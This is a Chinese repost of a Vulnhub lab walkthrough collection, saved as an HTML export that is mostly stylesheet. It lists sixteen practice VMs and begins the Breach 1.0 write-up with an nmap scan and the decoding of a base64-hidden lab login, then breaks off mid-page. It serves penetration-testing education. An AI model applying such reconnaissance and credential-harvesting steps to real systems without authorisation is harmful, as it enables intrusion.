碼上歡樂
相關內容    簡體    繁體

Vulnhub靶場題解

本文轉載自   查看原文   2019-07-25 15:21   2809    學習筆記

Vulnhub簡介

Vulnhub是一個提供各種漏洞環境的靶場平台,供安全愛好者學習滲透使用,大部分環境是做好的虛擬機鏡像文件,鏡像預先設計了多種漏洞,需要使用VMware或者VirtualBox運行。每個鏡像會有破解的目標,大多是Boot2root,從啟動虛機到獲取操作系統的root權限和查看flag。網址:https://www.vulnhub.com

 

 

 

 

吧下面代碼復制另存為后綴為.html文件打開就可以正常訪問了

<!doctype html>
<html>
<head>
<meta charset='UTF-8'><meta name='viewport' content='width=device-width initial-scale=1'>
<title>Vulnhub靶場題解 - 紅日安全團隊</title><link href='https://fonts.googleapis.com/css?family=Open+Sans:400italic,700italic,700,400&subset=latin,latin-ext' rel='stylesheet' type='text/css' /><style type='text/css'>html {overflow-x: initial !important;}#write, body { height: auto; }
#write, #write h1, #write h2, #write h3, #write h4, #write h5, #write h6, #write ol, #write p, #write ul { position: relative; }
#write, #write h1, #write h2, #write h3, #write h4, #write h5, #write h6, #write p, #write pre { width: inherit; }
#write, pre { white-space: pre-wrap; }
.CodeMirror, .md-fences, table { text-align: left; }
.md-reset, a:active, a:hover { outline: 0px; }
.md-reset, .md-toc-item a { text-decoration: none; }
.MathJax_SVG, .md-reset { float: none; direction: ltr; }
:root { --bg-color:#ffffff; --text-color:#333333; }
html { font-size: 14px; background-color: var(--bg-color); color: var(--text-color); font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; -webkit-font-smoothing: antialiased; }
body { margin: 0px; padding: 0px; bottom: 0px; top: 0px; left: 0px; right: 0px; font-size: 1rem; line-height: 1.42857; overflow-x: hidden; background: inherit; }
a.url { word-break: break-all; }
.in-text-selection, ::selection { background: rgb(181, 214, 252); text-shadow: none; }
#write { margin: 0px auto; word-break: normal; word-wrap: break-word; padding-bottom: 70px; overflow-x: visible; }
.first-line-indent #write p .md-line { text-indent: 0px; }
.first-line-indent #write li, .first-line-indent #write p, .first-line-indent #write p .md-line:first-child { text-indent: 2em; }
.for-image #write { padding-left: 8px; padding-right: 8px; }
body.typora-export { padding-left: 30px; padding-right: 30px; }
@media screen and (max-width: 500px) {
  body.typora-export { padding-left: 0px; padding-right: 0px; }
  .CodeMirror-sizer { margin-left: 0px !important; }
  .CodeMirror-gutters { display: none !important; }
}
#write > blockquote:first-child, #write > div:first-child, #write > ol:first-child, #write > p:first-child, #write > pre:first-child, #write > table:first-child, #write > ul:first-child { margin-top: 30px; }
#write li > table:first-child { margin-top: -20px; }
img { max-width: 100%; vertical-align: middle; }
button, input, select, textarea { color: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; }
input[type="checkbox"], input[type="radio"] { line-height: normal; padding: 0px; }
*, ::after, ::before { box-sizing: border-box; }
h1 { font-size: 2rem; }
h2 { font-size: 1.8rem; }
h3 { font-size: 1.6rem; }
h4 { font-size: 1.4rem; }
h5 { font-size: 1.2rem; }
h6 { font-size: 1rem; }
p { -webkit-margin-before: 1rem; -webkit-margin-after: 1rem; -webkit-margin-start: 0px; -webkit-margin-end: 0px; }
.mathjax-block { margin-top: 0px; margin-bottom: 0px; -webkit-margin-before: 0px; -webkit-margin-after: 0px; }
.hidden { display: none; }
.md-blockmeta { color: rgb(204, 204, 204); font-weight: 700; font-style: italic; }
a { cursor: pointer; }
sup.md-footnote { padding: 2px 4px; background-color: rgba(238, 238, 238, 0.7); color: rgb(85, 85, 85); border-radius: 4px; }
#write input[type="checkbox"] { cursor: pointer; width: inherit; height: inherit; }
#write > figure:first-child { margin-top: 16px; }
figure { overflow-x: auto; margin: -8px 0px 0px -8px; max-width: calc(100% + 16px); padding: 8px; }
tr { break-inside: avoid; break-after: auto; }
thead { display: table-header-group; }
table { border-collapse: collapse; border-spacing: 0px; width: 100%; overflow: auto; break-inside: auto; }
.CodeMirror-line, .md-fences { break-inside: avoid; }
table.md-table td { min-width: 80px; }
.CodeMirror-gutters { border-right: 0px; background-color: inherit; margin-right: 4px; }
.CodeMirror-placeholder { opacity: 0.3; }
.CodeMirror pre { padding: 0px 4px; }
.CodeMirror-lines { padding: 0px; }
div.hr:focus { cursor: none; }
.md-fences { font-size: 0.9rem; display: block; overflow: visible; white-space: pre; background: inherit; position: relative !important; }
.md-diagram-panel { width: 100%; margin-top: 10px; text-align: center; padding-top: 0px; padding-bottom: 8px; overflow-x: auto; }
.md-fences .CodeMirror.CodeMirror-wrap { top: -1.6em; margin-bottom: -1.6em; }
.md-fences.mock-cm { white-space: pre-wrap; }
.show-fences-line-number .md-fences { padding-left: 0px; }
.show-fences-line-number .md-fences.mock-cm { padding-left: 40px; }
.footnotes { opacity: 0.8; font-size: 0.9rem; margin-top: 1em; margin-bottom: 1em; }
.footnotes + .footnotes { margin-top: 0px; }
.md-reset { margin: 0px; padding: 0px; border: 0px; vertical-align: top; background: 0px 0px; text-shadow: none; position: static; width: auto; height: auto; white-space: nowrap; cursor: inherit; -webkit-tap-highlight-color: transparent; line-height: normal; font-weight: 400; text-align: left; box-sizing: content-box; }
.md-toc-inner, a img, img a { cursor: pointer; }
li div { padding-top: 0px; }
blockquote { margin: 1rem 0px; }
li .mathjax-block, li p { margin: 0.5rem 0px; }
li { margin: 0px; position: relative; }
blockquote > :last-child { margin-bottom: 0px; }
blockquote > :first-child { margin-top: 0px; }
.footnotes-area { color: rgb(136, 136, 136); margin-top: 0.714rem; padding-bottom: 0.143rem; white-space: normal; }
@media print {
  body, html { border: 1px solid transparent; height: 99%; break-after: avoid; break-before: avoid; }
  #write { margin-top: 0px; border-color: transparent !important; }
  .typora-export * { -webkit-print-color-adjust: exact; }
  h1, h2, h3, h4, h5, h6 { break-after: avoid-page; orphans: 2; }
  p { orphans: 4; }
  html.blink-to-pdf { font-size: 13px; }
  .typora-export #write { padding-left: 1cm; padding-right: 1cm; padding-bottom: 0px; break-after: avoid; }
  .typora-export #write::after { height: 0px; }
  @page { margin: 20mm 0px; }
}
.footnote-line { white-space: pre-wrap; margin-top: 0.714em; font-size: 0.7em; }
pre.md-meta-block { font-size: 0.8rem; min-height: 0.8rem; white-space: pre-wrap; background: rgb(204, 204, 204); display: block; overflow-x: hidden; }
p > img:only-child { display: block; margin: auto; }
.md-line > .md-image:only-child, p > .md-image:only-child { display: inline-block; width: 100%; text-align: center; }
.mathjax-block:not(:empty)::after, .md-toc-content::after, .md-toc::after { display: none; }
#write .MathJax_Display { margin: 0.8em 0px 0px; }
.mathjax-block { white-space: pre; overflow: hidden; width: 100%; }
p + .mathjax-block { margin-top: -1.143rem; }
[contenteditable="true"]:active, [contenteditable="true"]:focus { outline: 0px; box-shadow: none; }
.md-task-list-item { position: relative; list-style-type: none; }
.task-list-item.md-task-list-item { padding-left: 0px; }
.md-task-list-item > input { position: absolute; top: 0px; left: 0px; margin-left: -1.2em; margin-top: calc(1em - 10px); }
.math { font-size: 1rem; }
.md-toc { min-height: 3.58rem; position: relative; font-size: 0.9rem; border-radius: 10px; }
.MathJax_SVG, .mathjax-block .MathJax_SVG_Display { text-indent: 0px; max-width: none; max-height: none; min-height: 0px; }
.md-toc-content { position: relative; margin-left: 0px; }
.md-toc-item { display: block; color: rgb(65, 131, 196); }
.md-toc-inner:hover { }
.md-toc-inner { display: inline-block; }
.md-toc-h1 .md-toc-inner { margin-left: 0px; font-weight: 700; }
.md-toc-h2 .md-toc-inner { margin-left: 2em; }
.md-toc-h3 .md-toc-inner { margin-left: 4em; }
.md-toc-h4 .md-toc-inner { margin-left: 6em; }
.md-toc-h5 .md-toc-inner { margin-left: 8em; }
.md-toc-h6 .md-toc-inner { margin-left: 10em; }
@media screen and (max-width: 48em) {
  .md-toc-h3 .md-toc-inner { margin-left: 3.5em; }
  .md-toc-h4 .md-toc-inner { margin-left: 5em; }
  .md-toc-h5 .md-toc-inner { margin-left: 6.5em; }
  .md-toc-h6 .md-toc-inner { margin-left: 8em; }
}
a.md-toc-inner { font-size: inherit; font-style: inherit; font-weight: inherit; line-height: inherit; }
.footnote-line a:not(.reversefootnote) { color: inherit; }
.md-attr { display: none; }
.md-fn-count::after { content: "."; }
code, pre, tt { font-family: var(--monospace); }
.md-comment { color: rgb(162, 127, 3); opacity: 0.8; font-family: var(--monospace); }
code { text-align: left; }
a.md-print-anchor { border-width: initial !important; border-style: none !important; border-color: initial !important; display: inline-block !important; position: absolute !important; width: 1px !important; right: 0px !important; outline: 0px !important; background: 0px 0px !important; text-decoration: initial !important; text-shadow: initial !important; }
.md-inline-math .MathJax_SVG .noError { display: none !important; }
.mathjax-block .MathJax_SVG_Display { text-align: center; margin: 1em 0px; position: relative; min-width: 100%; width: auto; display: block !important; }
.MathJax_SVG_Display, .md-inline-math .MathJax_SVG_Display { width: auto; margin: inherit; display: inline-block !important; }
.MathJax_SVG .MJX-monospace { font-family: monospace; }
.MathJax_SVG .MJX-sans-serif { font-family: sans-serif; }
.MathJax_SVG { display: inline; font-style: normal; font-weight: 400; line-height: normal; zoom: 90%; text-align: left; text-transform: none; letter-spacing: normal; word-spacing: normal; word-wrap: normal; white-space: nowrap; min-width: 0px; border: 0px; padding: 0px; margin: 0px; }
.MathJax_SVG * { transition: none; }
.os-windows.monocolor-emoji .md-emoji { font-family: "Segoe UI Symbol", sans-serif; }
.md-diagram-panel > svg, [lang="flow"] svg, [lang="mermaid"] svg { max-width: 100%; }
[lang="mermaid"] .node text { font-size: 1rem; }
table tr th { border-bottom: 0px; }
 
 
.CodeMirror, .CodeMirror-sizer { position: relative; }
.CodeMirror.cm-s-inner { background: inherit; }
.fences-no-line-wrapping .md-fences .CodeMirror { margin-top: -30px; }
.CodeMirror-scroll { overflow-y: hidden; overflow-x: auto; }
.CodeMirror-lines { padding: 4px 0px; }
.CodeMirror-gutter-filler, .CodeMirror-scrollbar-filler { background-color: rgb(255, 255, 255); }
.CodeMirror-scroll, .cm-s-inner .CodeMirror-activeline-background { background: inherit; }
.CodeMirror-linenumber { padding: 0px 3px 0px 5px; text-align: right; color: rgb(153, 153, 153); }
.cm-s-inner .cm-keyword { color: rgb(119, 0, 136); }
.cm-s-inner .cm-atom, .cm-s-inner.cm-atom { color: rgb(34, 17, 153); }
.cm-s-inner .cm-number { color: rgb(17, 102, 68); }
.cm-s-inner .cm-def { color: rgb(0, 0, 255); }
.cm-s-inner .cm-variable { color: rgb(0, 0, 0); }
.cm-s-inner .cm-variable-2 { color: rgb(0, 85, 170); }
.cm-s-inner .cm-variable-3 { color: rgb(0, 136, 85); }
.cm-s-inner .cm-string { color: rgb(170, 17, 17); }
.cm-s-inner .cm-property { color: rgb(0, 0, 0); }
.cm-s-inner .cm-operator { color: rgb(152, 26, 26); }
.cm-s-inner .cm-comment, .cm-s-inner.cm-comment { color: rgb(170, 85, 0); }
.cm-s-inner .cm-string-2 { color: rgb(255, 85, 0); }
.cm-s-inner .cm-meta, .cm-s-inner .cm-qualifier { color: rgb(85, 85, 85); }
.cm-s-inner .cm-builtin { color: rgb(51, 0, 170); }
.cm-s-inner .cm-bracket { color: rgb(153, 153, 119); }
.cm-s-inner .cm-tag { color: rgb(17, 119, 0); }
.cm-s-inner .cm-attribute { color: rgb(0, 0, 204); }
.cm-s-inner .cm-header, .cm-s-inner.cm-header { color: rgb(0, 0, 255); }
.cm-s-inner .cm-quote, .cm-s-inner.cm-quote { color: rgb(0, 153, 0); }
.cm-s-inner .cm-hr, .cm-s-inner.cm-hr { color: rgb(153, 153, 153); }
.cm-s-inner .cm-link, .cm-s-inner.cm-link { color: rgb(0, 0, 204); }
.cm-negative { color: rgb(221, 68, 68); }
.cm-positive { color: rgb(34, 153, 34); }
.cm-header, .cm-strong { font-weight: 700; }
.cm-del { text-decoration: line-through; }
.cm-em { font-style: italic; }
.cm-link { text-decoration: underline; }
.cm-error, .cm-invalidchar { color: red; }
.cm-constant { color: rgb(38, 139, 210); }
.cm-defined { color: rgb(181, 137, 0); }
div.CodeMirror span.CodeMirror-matchingbracket { color: rgb(0, 255, 0); }
div.CodeMirror span.CodeMirror-nonmatchingbracket { color: rgb(255, 34, 34); }
.CodeMirror { height: auto; overflow: hidden; }
.CodeMirror-scroll { margin-bottom: -30px; padding-bottom: 30px; height: 100%; outline: 0px; position: relative; box-sizing: content-box; }
.CodeMirror-gutter-filler, .CodeMirror-hscrollbar, .CodeMirror-scrollbar-filler, .CodeMirror-vscrollbar { position: absolute; z-index: 6; display: none; }
.CodeMirror-vscrollbar { right: 0px; top: 0px; overflow-x: hidden; overflow-y: scroll; }
.CodeMirror-hscrollbar { bottom: 0px; left: 0px; overflow-y: hidden; overflow-x: scroll; }
.CodeMirror-scrollbar-filler { right: 0px; bottom: 0px; }
.CodeMirror-gutter-filler { left: 0px; bottom: 0px; }
.CodeMirror-gutters { border-right: 1px solid rgb(221, 221, 221); background: inherit; white-space: nowrap; position: absolute; left: 0px; top: 0px; padding-bottom: 30px; z-index: 3; }
.CodeMirror-gutter { white-space: normal; height: 100%; box-sizing: content-box; padding-bottom: 30px; margin-bottom: -32px; display: inline-block; }
.CodeMirror-gutter-wrapper { position: absolute; z-index: 4; background: 0px 0px !important; border: none !important; }
.CodeMirror-gutter-background { position: absolute; top: 0px; bottom: 0px; z-index: 4; }
.CodeMirror-gutter-elt { position: absolute; cursor: default; z-index: 4; }
.CodeMirror-lines { cursor: text; }
.CodeMirror pre { border-radius: 0px; border-width: 0px; background: 0px 0px; font-family: inherit; font-size: inherit; margin: 0px; white-space: pre; word-wrap: normal; color: inherit; z-index: 2; position: relative; overflow: visible; }
.CodeMirror-wrap pre { word-wrap: break-word; white-space: pre-wrap; word-break: normal; }
.CodeMirror-code pre { border-right: 30px solid transparent; width: fit-content; }
.CodeMirror-wrap .CodeMirror-code pre { border-right: none; width: auto; }
.CodeMirror-linebackground { position: absolute; left: 0px; right: 0px; top: 0px; bottom: 0px; z-index: 0; }
.CodeMirror-linewidget { position: relative; z-index: 2; overflow: auto; }
.CodeMirror-wrap .CodeMirror-scroll { overflow-x: hidden; }
.CodeMirror-measure { position: absolute; width: 100%; height: 0px; overflow: hidden; visibility: hidden; }
.CodeMirror-measure pre { position: static; }
.CodeMirror div.CodeMirror-cursor { position: absolute; border-right: none; width: 0px; visibility: hidden; }
.CodeMirror-focused div.CodeMirror-cursor { visibility: inherit; }
.CodeMirror-selected { background: rgb(217, 217, 217); }
.CodeMirror-focused .CodeMirror-selected { background: rgb(215, 212, 240); }
.cm-searching { background: rgba(255, 255, 0, 0.4); }
@media print {
  .CodeMirror div.CodeMirror-cursor { visibility: hidden; }
}
.CodeMirror-lint-markers { width: 16px; }
.CodeMirror-lint-tooltip { background-color: infobackground; border: 1px solid rgb(0, 0, 0); border-radius: 4px; color: infotext; font-family: var(--monospace); overflow: hidden; padding: 2px 5px; position: fixed; white-space: pre-wrap; z-index: 10000; max-width: 600px; opacity: 0; transition: opacity 0.4s; font-size: 0.8em; }
.CodeMirror-lint-mark-error, .CodeMirror-lint-mark-warning { background-position: left bottom; background-repeat: repeat-x; }
.CodeMirror-lint-mark-error { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAQAAAADCAYAAAC09K7GAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9sJDw4cOCW1/KIAAAAZdEVYdENvbW1lbnQAQ3JlYXRlZCB3aXRoIEdJTVBXgQ4XAAAAHElEQVQI12NggIL/DAz/GdA5/xkY/qPKMDAwAADLZwf5rvm+LQAAAABJRU5ErkJggg=="); }
.CodeMirror-lint-marker-error, .CodeMirror-lint-marker-warning { background-position: center center; background-repeat: no-repeat; cursor: pointer; display: inline-block; height: 16px; width: 16px; vertical-align: middle; position: relative; }
.CodeMirror-lint-message-error, .CodeMirror-lint-message-warning { padding-left: 18px; background-position: left top; background-repeat: no-repeat; }
.CodeMirror-lint-marker-error, .CodeMirror-lint-message-error { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAAHlBMVEW7AAC7AACxAAC7AAC7AAAAAAC4AAC5AAD///+7AAAUdclpAAAABnRSTlMXnORSiwCK0ZKSAAAATUlEQVR42mWPOQ7AQAgDuQLx/z8csYRmPRIFIwRGnosRrpamvkKi0FTIiMASR3hhKW+hAN6/tIWhu9PDWiTGNEkTtIOucA5Oyr9ckPgAWm0GPBog6v4AAAAASUVORK5CYII="); }
.CodeMirror-lint-marker-warning, .CodeMirror-lint-message-warning { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAANlBMVEX/uwDvrwD/uwD/uwD/uwD/uwD/uwD/uwD/uwD6twD/uwAAAADurwD2tQD7uAD+ugAAAAD/uwDhmeTRAAAADHRSTlMJ8mN1EYcbmiixgACm7WbuAAAAVklEQVR42n3PUQqAIBBFUU1LLc3u/jdbOJoW1P08DA9Gba8+YWJ6gNJoNYIBzAA2chBth5kLmG9YUoG0NHAUwFXwO9LuBQL1giCQb8gC9Oro2vp5rncCIY8L8uEx5ZkAAAAASUVORK5CYII="); }
.CodeMirror-lint-marker-multiple { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAcAAAAHCAMAAADzjKfhAAAACVBMVEUAAAAAAAC/v7914kyHAAAAAXRSTlMAQObYZgAAACNJREFUeNo1ioEJAAAIwmz/H90iFFSGJgFMe3gaLZ0od+9/AQZ0ADosbYraAAAAAElFTkSuQmCC"); background-repeat: no-repeat; background-position: right bottom; width: 100%; height: 100%; }
 
 
:root { --side-bar-bg-color: #fafafa; --control-text-color: #777; }
@font-face { font-family: "Open Sans"; font-style: normal; font-weight: normal; src: local("Open Sans Regular"), url("./github/400.woff") format("woff"); }
@font-face { font-family: "Open Sans"; font-style: italic; font-weight: normal; src: local("Open Sans Italic"), url("./github/400i.woff") format("woff"); }
@font-face { font-family: "Open Sans"; font-style: normal; font-weight: bold; src: local("Open Sans Bold"), url("./github/700.woff") format("woff"); }
@font-face { font-family: "Open Sans"; font-style: italic; font-weight: bold; src: local("Open Sans Bold Italic"), url("./github/700i.woff") format("woff"); }
html { font-size: 16px; }
body { font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; color: rgb(51, 51, 51); line-height: 1.6; }
#write { max-width: 860px; margin: 0px auto; padding: 20px 30px 100px; }
#write > ul:first-child, #write > ol:first-child { margin-top: 30px; }
body > :first-child { margin-top: 0px !important; }
body > :last-child { margin-bottom: 0px !important; }
a { color: rgb(65, 131, 196); }
h1, h2, h3, h4, h5, h6 { position: relative; margin-top: 1rem; margin-bottom: 1rem; font-weight: bold; line-height: 1.4; cursor: text; }
h1:hover a.anchor, h2:hover a.anchor, h3:hover a.anchor, h4:hover a.anchor, h5:hover a.anchor, h6:hover a.anchor { text-decoration: none; }
h1 tt, h1 code { font-size: inherit; }
h2 tt, h2 code { font-size: inherit; }
h3 tt, h3 code { font-size: inherit; }
h4 tt, h4 code { font-size: inherit; }
h5 tt, h5 code { font-size: inherit; }
h6 tt, h6 code { font-size: inherit; }
h1 { padding-bottom: 0.3em; font-size: 2.25em; line-height: 1.2; border-bottom: 1px solid rgb(238, 238, 238); }
h2 { padding-bottom: 0.3em; font-size: 1.75em; line-height: 1.225; border-bottom: 1px solid rgb(238, 238, 238); }
h3 { font-size: 1.5em; line-height: 1.43; }
h4 { font-size: 1.25em; }
h5 { font-size: 1em; }
h6 { font-size: 1em; color: rgb(119, 119, 119); }
p, blockquote, ul, ol, dl, table { margin: 0.8em 0px; }
li > ol, li > ul { margin: 0px; }
hr { height: 4px; padding: 0px; margin: 16px 0px; background-color: rgb(231, 231, 231); border-width: 0px 0px 1px; border-style: none none solid; border-top-color: initial; border-right-color: initial; border-left-color: initial; border-image: initial; overflow: hidden; box-sizing: content-box; border-bottom-color: rgb(221, 221, 221); }
body > h2:first-child { margin-top: 0px; padding-top: 0px; }
body > h1:first-child { margin-top: 0px; padding-top: 0px; }
body > h1:first-child + h2 { margin-top: 0px; padding-top: 0px; }
body > h3:first-child, body > h4:first-child, body > h5:first-child, body > h6:first-child { margin-top: 0px; padding-top: 0px; }
a:first-child h1, a:first-child h2, a:first-child h3, a:first-child h4, a:first-child h5, a:first-child h6 { margin-top: 0px; padding-top: 0px; }
h1 p, h2 p, h3 p, h4 p, h5 p, h6 p { margin-top: 0px; }
li p.first { display: inline-block; }
ul, ol { padding-left: 30px; }
ul:first-child, ol:first-child { margin-top: 0px; }
ul:last-child, ol:last-child { margin-bottom: 0px; }
blockquote { border-left: 4px solid rgb(221, 221, 221); padding: 0px 15px; color: rgb(119, 119, 119); }
blockquote blockquote { padding-right: 0px; }
table { padding: 0px; word-break: initial; }
table tr { border-top: 1px solid rgb(204, 204, 204); margin: 0px; padding: 0px; }
table tr:nth-child(2n) { background-color: rgb(248, 248, 248); }
table tr th { font-weight: bold; border-width: 1px 1px 0px; border-top-style: solid; border-right-style: solid; border-left-style: solid; border-top-color: rgb(204, 204, 204); border-right-color: rgb(204, 204, 204); border-left-color: rgb(204, 204, 204); border-image: initial; border-bottom-style: initial; border-bottom-color: initial; text-align: left; margin: 0px; padding: 6px 13px; }
table tr td { border: 1px solid rgb(204, 204, 204); text-align: left; margin: 0px; padding: 6px 13px; }
table tr th:first-child, table tr td:first-child { margin-top: 0px; }
table tr th:last-child, table tr td:last-child { margin-bottom: 0px; }
.CodeMirror-gutters { border-right: 1px solid rgb(221, 221, 221); }
.md-fences, code, tt { border: 1px solid rgb(221, 221, 221); background-color: rgb(248, 248, 248); border-radius: 3px; font-family: Consolas, "Liberation Mono", Courier, monospace; padding: 2px 4px 0px; font-size: 0.9em; }
.md-fences { margin-bottom: 15px; margin-top: 15px; padding: 8px 1em 6px; }
.md-task-list-item > input { margin-left: -1.3em; }
@media screen and (min-width: 914px) {
}
@media print {
  html { font-size: 13px; }
  table, pre { break-inside: avoid; }
  pre { word-wrap: break-word; }
}
.md-fences { background-color: rgb(248, 248, 248); }
#write pre.md-meta-block { padding: 1rem; font-size: 85%; line-height: 1.45; background-color: rgb(247, 247, 247); border: 0px; border-radius: 3px; color: rgb(119, 119, 119); margin-top: 0px !important; }
.mathjax-block > .code-tooltip { bottom: 0.375rem; }
#write > h3.md-focus::before { left: -1.5625rem; top: 0.375rem; }
#write > h4.md-focus::before { left: -1.5625rem; top: 0.285714rem; }
#write > h5.md-focus::before { left: -1.5625rem; top: 0.285714rem; }
#write > h6.md-focus::before { left: -1.5625rem; top: 0.285714rem; }
.md-image > .md-meta { border-radius: 3px; font-family: Consolas, "Liberation Mono", Courier, monospace; padding: 2px 0px 0px 4px; font-size: 0.9em; color: inherit; }
.md-tag { color: inherit; }
.md-toc { margin-top: 20px; padding-bottom: 20px; }
.sidebar-tabs { border-bottom: none; }
#typora-quick-open { border: 1px solid rgb(221, 221, 221); background-color: rgb(248, 248, 248); }
#typora-quick-open-item { background-color: rgb(250, 250, 250); border-color: rgb(254, 254, 254) rgb(229, 229, 229) rgb(229, 229, 229) rgb(238, 238, 238); border-style: solid; border-width: 1px; }
#md-notification::before { top: 10px; }
.on-focus-mode blockquote { border-left-color: rgba(85, 85, 85, 0.12); }
header, .context-menu, .megamenu-content, footer { font-family: "Segoe UI", Arial, sans-serif; }
.file-node-content:hover .file-node-icon, .file-node-content:hover .file-node-open-state { visibility: visible; }
.mac-seamless-mode #typora-sidebar { background-color: var(--side-bar-bg-color); }
.md-lang { color: rgb(180, 101, 77); }
.html-for-mac .context-menu { --item-hover-bg-color: #E6F0FE; }
 
 
 
 
 
 .typora-export p, .typora-export .footnote-line {white-space: normal;} 
</style>
</head>
<body class='typora-export os-windows' >
<div  id='write'  class = 'is-node'><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/vulhub%E9%9D%B6%E5%9C%BA_meitu_1.jpg' alt='' referrerPolicy='no-referrer' /></p><p> </p><h2><a name='header-n7001' class='md-header-anchor '></a> </h2><p> </p><p> </p><h2><a name='header-n7006' class='md-header-anchor '></a>目錄</h2><h4><a name='header-n7007' class='md-header-anchor '></a>Vulnhub滲透測試練習(一)-------------------------------Breach1.0</h4><h4><a name='header-n7008' class='md-header-anchor '></a>Vulnhub滲透測試練習(二) ------------------------------Billu_b0x</h4><h4><a name='header-n7009' class='md-header-anchor '></a>Vulnhub滲透測試練習(三) -------------------------------Bulldog1</h4><h4><a name='header-n7010' class='md-header-anchor '></a>Vulnhub滲透測試練習(四)---------------------------------Acid</h4><h4><a name='header-n7011' class='md-header-anchor '></a>Vulnhub滲透測試練習(五)---------------------------------LazysysAdmin-1</h4><h4><a name='header-n7012' class='md-header-anchor '></a>Vulnhub滲透測試練習(六)---------------------------------Freshly</h4><h4><a name='header-n7013' class='md-header-anchor '></a>Vulnhub滲透測試練習(七)---------------------------------FristiLeaks v1.3</h4><h4><a name='header-n7014' class='md-header-anchor '></a>Vulnhub滲透測試練習(八)---------------------------------The Ether</h4><h4><a name='header-n7015' class='md-header-anchor '></a>Vulnhub滲透測試練習(九)---------------------------------zico2</h4><h4><a name='header-n7016' class='md-header-anchor '></a>Vulnhub滲透測試練習(十)---------------------------------Quaoar</h4><h4><a name='header-n7017' class='md-header-anchor '></a>Vulnhub滲透測試練習(十一)---------------------------------SickOs 1.1</h4><h4><a name='header-n7018' class='md-header-anchor '></a>Vulnhub滲透測試練習(十二)---------------------------------BSides-Vancouver-2018-Workshop</h4><h4><a name='header-n7019' class='md-header-anchor '></a>Vulnhub滲透測試練習(十三)---------------------------------Kioptrix 1</h4><h4><a name='header-n7020' class='md-header-anchor '></a>Vulnhub滲透測試練習(十四)----------------------------------Zico2</h4><h4><a name='header-n7021' class='md-header-anchor '></a>Vulnhub滲透測試練習(十五)----------------------------------Kioptrix 3</h4><h4><a name='header-n7022' class='md-header-anchor '></a>Vulnhub滲透測試練習(十六)----------------------------------Kioptrix 4</h4><p> </p><p> </p><p> </p><p> </p><p> </p><p> </p><p> </p><h1><a name='header-n7037' class='md-header-anchor '></a>Vulnhub靶場題解 - 紅日安全團隊</h1><h2><a name='header-n7038' class='md-header-anchor '></a>Vulnhub簡介</h2><p>Vulnhub是一個提供各種漏洞環境的靶場平台,供安全愛好者學習滲透使用,大部分環境是做好的虛擬機鏡像文件,鏡像預先設計了多種漏洞,需要使用VMware或者VirtualBox運行。每個鏡像會有破解的目標,大多是Boot2root,從啟動虛機到獲取操作系統的root權限和查看flag。網址:<a href='https://www.vulnhub.com' target='_blank' class='url'>https://www.vulnhub.com</a></p><h1><a name='header-n7041' class='md-header-anchor '></a>第一節 Breach1.0</h1><h2><a name='header-n7042' class='md-header-anchor '></a>靶機信息</h2><h3><a name='header-n7044' class='md-header-anchor '></a>下載鏈接</h3><p><a href='https://download.vulnhub.com/breach/Breach-1.0.zip' target='_blank' class='url'>https://download.vulnhub.com/breach/Breach-1.0.zip</a></p><h3><a name='header-n7047' class='md-header-anchor '></a>靶機說明</h3><p>Breach1.0是一個難度為初級到中級的BooT2Root/CTF挑戰。</p><p>VM虛機配置有靜態IP地址(192.168.110.140),需要將虛擬機網卡設置為host-only方式組網。非常感謝Knightmare和rastamouse進行測試和提供反饋。作者期待大家寫出文章,特別是通過非預期的方式獲取root權限。</p><h3><a name='header-n7052' class='md-header-anchor '></a>目標</h3><p>Boot to root:獲得root權限,查看flag。</p><h3><a name='header-n7055' class='md-header-anchor '></a>運行環境</h3><ul><li>靶機:網絡連接方式設置為主機模式(host-only),靜態IP是192.168.110.140。</li><li>攻擊機:同網段下有Windows攻擊機(物理機),IP地址:192.168.110.220,安裝有Nmap、Burpsuit、Wireshark、Sqlmap、nc、Python2.7、JDK、DirBuster、AWVS、Nessus等滲透工具,也可以使用Kali Linux攻擊機。</li></ul><h2><a name='header-n7063' class='md-header-anchor '></a>信息收集</h2><ul><li>端口服務識別</li></ul><p>啟動Breach1.0虛擬機,由於IP已知,使用nmap掃描端口,並做服務識別和深度掃描(加-A參數),掃描結果保存到txt文件,命令:</p><p><code>nmap -v -A 192.168.110.140 -oN Breach.txt</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/1.jpg' alt='' referrerPolicy='no-referrer' /></p><p>發現端口幾乎全開放了,顯然是有問題,虛擬機對端口掃描做了一些防護措施,直接訪問80端口,進入web首頁:<code>http://192.168.110.140/</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/2.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7078' class='md-header-anchor '></a>漏洞挖掘</h2><h3><a name='header-n7079' class='md-header-anchor '></a>0x01:查看首頁源碼,解碼得到密碼</h3><p>(1) 查看首頁源碼,發現提示:<code>Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo</code> 這是一串base64編碼。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/3.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) 將其復制到Burpsuit Decoder進行base64解碼,解密后發現還是base64編碼,繼續base64解碼,得到<code>pgibbons:damnitfeel$goodtobeagang$ta</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/4.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n7088' class='md-header-anchor '></a>0x02:登錄cms,查看郵件,下載包含SSL證書的密鑰庫keystore文件</h3><p>(1) 點擊首頁的圖片,進入<code>initech.html</code></p><p><img 